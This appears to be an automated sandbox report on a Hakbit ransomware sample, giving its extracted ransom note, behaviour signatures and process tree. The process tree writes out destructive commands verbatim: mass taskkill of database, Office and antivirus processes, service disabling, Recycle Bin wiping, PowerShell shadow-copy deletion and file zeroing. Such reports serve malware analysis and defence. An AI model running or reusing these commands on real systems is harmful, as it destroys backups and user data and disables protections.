Analysis

  • max time kernel
    1788s
  • max time network
    1786s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    20-11-2020 14:34

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below [email protected] Key Identifier: AurLkNjAgbjanuDB/60MzNmn2c/YqPxL1asGmTG80+NCkBjZ2vXLtGUaqQTTP4IPFTyMtTI85kPMGqZ/X2wFDQUfMrKg9pzhk6mXJw7UibHl+wzHclZTbOUc16lkPinb5sMOtFkvKTS73MC5d733N7iTAyBf/D9rfqIO4VqVd5YdAeNOMw/IRvn3ifZyNPWHYKDhT/1C86gRrumhYZJkF2sbHd3CM1dpUlMDWIMSs8K16e7A1Ra2tzfbjg8z305vg7X+4IwTBnu1Sbm5YstbWZBB3k7OOlLLCH/y5+kXRi+xIKzFPBflFwlg4MKqqNj/UO2s26NWfMeqouuF9mxV1MgEEGESP9btTLyX+1xJZLY/W+OF14R3JBbqbw7G2e8j8EPB0wTgYnTmejhJUAcSTJJ/AIQrqPpCk/XgHDxzITuUEgDivP8jGIFha42gO3tXAeAQ/2sfD/wuomlDT8UGSHIgoG7Cq3RrHJDL/8yzJQrXN/H4450nuoU1CgMTRaIFgqKIZb/FeIr9jIsi/0CK/MH+QDaRvLAr+2Dfkje7UcxAa02dHx1jXc7VOFqAKdghfecAok9OWsnUjnnStgY/cxzi9uHySdRkRO2WUYcIhpvMCIJLJec3OJD0x5ip0Z6d7gI+kg3vyp2iLyQ4/QpZdERb1+uoqU+aLPywnlPJDbw= Number of files that were processed is: 1274

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Kills process with taskkill 47 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:828
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
        PID:3820
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
        2⤵
          PID:2932
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
            PID:1696
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SQLWriter start= disabled
            2⤵
              PID:3428
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SstpSvc start= disabled
              2⤵
                PID:2960
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mspub.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:200
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopqos.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1476
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3196
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1344
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqbcoreservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2248
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM firefoxconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2292
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM agntsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2312
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3384
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM steam.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3976
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM encsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2364
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM excel.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2896
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM CNTAoSMgr.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3184
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlwriter.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3920
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tbirdconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2844
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbeng50.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2972
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat64.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4084
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocomm.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1268
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM infopath.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2456
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mbamtray.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4044
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM zoolz.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4048
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" IM thunderbird.exe /F
                2⤵
                • Kills process with taskkill
                PID:2104
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbsnmp.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4116
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM xfssvccon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4196
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mspub.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4240
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM Ntrtscan.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4260
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM isqlplussvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4300
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM onenote.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4348
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM PccNTMon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4384
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msaccess.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4428
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM outlook.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4504
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tmlisten.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4548
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msftesql.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4600
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM powerpnt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4632
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopqos.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4692
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM visio.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4716
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4756
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM winword.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4784
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld-nt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4868
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM wordpad.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4936
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld-opt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4964
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocautoupds.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5004
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocssd.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5076
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM oracle.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3428
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlagent.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4256
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlbrowser.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4268
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlservr.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5584
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM synctime.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:5596
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                2⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:5688
              • C:\Windows\System32\notepad.exe
                "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                2⤵
                • Opens file in notepad (likely ransom note)
                PID:5416
              • C:\Windows\SYSTEM32\cmd.exe
                "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                2⤵
                  PID:5116
                  • C:\Windows\system32\PING.EXE
                    ping 127.0.0.7 -n 3
                    3⤵
                    • Runs ping.exe
                    PID:4840
                  • C:\Windows\system32\fsutil.exe
                    fsutil file setZeroData offset=0 length=524288 “%s”
                    3⤵
                      PID:4352
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
                    2⤵
                      PID:5004
                      • C:\Windows\system32\choice.exe
                        choice /C Y /N /D Y /T 3
                        3⤵
                          PID:6328

                    Network

                    MITRE ATT&CK Enterprise v6

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • memory/828-1-0x0000000000610000-0x0000000000611000-memory.dmp

                      Filesize

                      4KB

                    • memory/828-0-0x00007FFAEEEE0000-0x00007FFAEF8CC000-memory.dmp

                      Filesize

                      9.9MB

                    • memory/5688-58-0x000001D6EE320000-0x000001D6EE321000-memory.dmp

                      Filesize

                      4KB

                    • memory/5688-57-0x000001D6EE170000-0x000001D6EE171000-memory.dmp

                      Filesize

                      4KB

                    • memory/5688-56-0x00007FFAEEEE0000-0x00007FFAEF8CC000-memory.dmp

                      Filesize

                      9.9MB